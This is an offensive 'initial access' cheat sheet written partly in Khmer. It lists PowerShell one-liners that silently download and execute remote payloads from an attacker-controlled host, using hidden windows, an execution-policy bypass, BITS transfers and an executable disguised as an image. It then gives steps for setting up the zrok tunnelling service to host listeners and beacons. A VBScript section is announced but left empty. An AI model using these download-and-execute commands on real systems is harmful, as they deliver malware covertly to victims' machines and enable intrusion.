Initial Access: Powershell Cheat Sheet

ខាងក្រោមនេះជាវិធីក្នុងការទាញយកនូវរាល់ Payloads ចេញពីអ៊ីនអឺណិត ។

Based On

PowerShell
VBScript
Batch Script

Method 1 - PowerShell Downloader

1
2
3
4
5


# Download and Execute Payload (PS1)
powershell -nop -c "iex(New-Object Net.WebClient).DownloadString('http://192.168.x.x:8081/test.ps1')"
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://192.168.x.x:8081/test.ps1'))"

# ./test.ps1 => Start-Process 'C:\windows\system32\calc.exe'

1
2
3
4


# Download/Save/Execute
PowerShell.exe -windowstyle hidden (New-Object System.Net.WebClient).DownloadFile('http://192.168.x.x:8081/cat.jpg','%temp%\putty.exe'); Start-Process '%temp%\putty.exe'

PowerShell -windowstyle hidden -ExecutionPolicy ByPass -NoProfile Start-BitsTransfer -Source http://192.168.x.x:8081/cat.jpg -Destination $env:temp\cat.exe; Start-Process $env:temp\cat.exe

Method 2 - VBScript Downloader

' Download and Execute Payload

ចូលទៅតំណភ្ជាប់នេះ https://docs.zrok.io/docs/getting-started/ បន្ទាប់មកសូមទាញយកកម្មវិធីឲ្យត្រូវទៅតាមប្រភេទនៃម៉ាស៊ីនមេរបស់អ្នក ក្នុងនៃនេះខ្ញុំនឹងយកប្រភេទ Linux ធ្វើជាម៉ាស៊ីនមេ ។

1

wget https://github.com/openziti/zrok/releases/download/v0.4.31/zrok_0.4.31_linux_arm64.tar.gz -O zrok.tar.gz

ពន្លាឯកសារចេញនោះអ្នកនឹងទទួលបានឯកសារគោលគឺ Zrok ។

ចូលទៅ Terminal និងវាយពាក្យបញ្ជាដូចខាងក្រោម៖

1

./zrok invite

បន្ទាប់មកសូមបញ្ជូល Email របស់អ្នកដើម្បីចុះឈ្មោះប្រើប្រាស់សេវាកម្ម ។

Zrok Invite

ចំពោះ Listener និង Beacons សូមចូលទៅកាន់អត្ថបទមុនរបស់ខ្ញុំ ដែលប្រើប្រាស់ Telebit ក្នុងការបង្កើត ៕